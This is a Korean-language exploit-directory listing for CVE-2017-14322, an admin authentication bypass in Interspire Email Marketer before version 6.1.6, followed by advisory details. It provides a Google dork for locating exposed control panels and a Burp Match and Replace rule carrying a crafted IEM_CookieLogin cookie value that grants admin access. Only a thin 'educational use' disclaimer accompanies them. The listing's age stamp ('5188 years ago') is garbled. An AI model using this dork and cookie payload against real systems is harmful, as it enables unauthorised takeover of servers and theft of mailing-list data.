Skip to content
KitploitKITPLOIT
도구익스플로잇블로그
Log in
제출
도구익스플로잇블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2017-14322 — CVE-2017-14322 Interspire Email Marketer (emailmarketer) 익스플로잇 | Kitploit
도구/GitHubGitHub/joesmithjaffa/cve-2017-14322
Authentication & AuthorizationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & Education
GitHubjoesmithjaffa/cve-2017-14322

CVE-2017-14322

CVE-2017-14322 Interspire Email Marketer (emailmarketer) 익스플로잇

저장소 보기
5188년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2017-14322 Interspire Email Marketer (emailmarketer) 익스플로잇

Google Dork

intitle:"Control Panel" + emailmarketer

Burp Suit을 사용한 익스플로잇

요청 헤더에 다음과 같이 Match and Replace를 추가하세요:

Match: ^Cookie.*$
Replace: Cookie: IEM_CookieLogin=YTo0OntzOjQ6InVzZXIiO3M6MToiMSI7czo0OiJ0aW1lIjtpOjE1MDU0NzcyOTQ7czo0OiJyYW5kIjtiOjE7czo4OiJ0YWtlbWV0byI7czo5OiJpbmRleC5waHAiO30%3D

사이트를 열면 처음에는 Cookie 헤더가 없기 때문에 작동하지 않습니다. 위의 규칙을 추가한 Burp 프록시를 사용하여 두 번째로 사이트를 새로고침하면 원하는 결과를 볼 수 있습니다. "Intercept Client Requests"를 체크해야 합니다.

Title:

Interspire Email Marketer - 원격 관리자 인증 우회

Author:

Hakan Küsne, Infoteam Security (CH)

CVE-ID:

CVE-2017-14322

위험 정보:

CVSS Base Score: 9.8 CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:F/RL:O

타임라인:

2017-09-12 취약점 발견 2017-09-12 공급업체가 이미 수정했지만 고객에게 전달하지 않아 수백 대의 취약한 시스템이 노출됨 2017-10-17 공개 공개

영향받는 제품:

버전 6.1.6 이전의 Interspire Email Marketer

공급업체 홈페이지:

http://www.interspire.com/emailmarketer/

세부 정보:

버전 6.1.6 이전의 Interspire Email Marketer (IEM)에서 사용자가 이미 로그인했는지 확인하는 init.php 함수는 원격 공격자가 특수하게 조작된 값으로 IEM_CookieLogin 쿠키를 사용하여 인증을 우회하고 관리자 접근 권한을 획득할 수 있도록 합니다. 게다가 고객이 연간 유지 관리 계획이 없는 경우 애플리케이션은 최신 버전이라고 표시하며 업데이트가 없다고 합니다. 이 취약점들은 해당 애플리케이션의 손상된 인스턴스에 대한 침해 대응 중에 발견되었습니다.

개념 증명:

세부 정보는 여기에서 확인하세요: https://security.infoteam.ch/en/blog/posts/narrative-of-an-incident-response-from-compromise-to-the-publication-of-the-weakness.html

수정 사항:

공급업체는 버전 6.1.6에서 취약점을 패치했지만, 고객에게 구체적으로 알리지 않았습니다.

참고:

이 익스플로잇은 교육 목적으로만 사용되며, 귀하의 행동에 대해 책임을 지지 않습니다.

도구 다운로드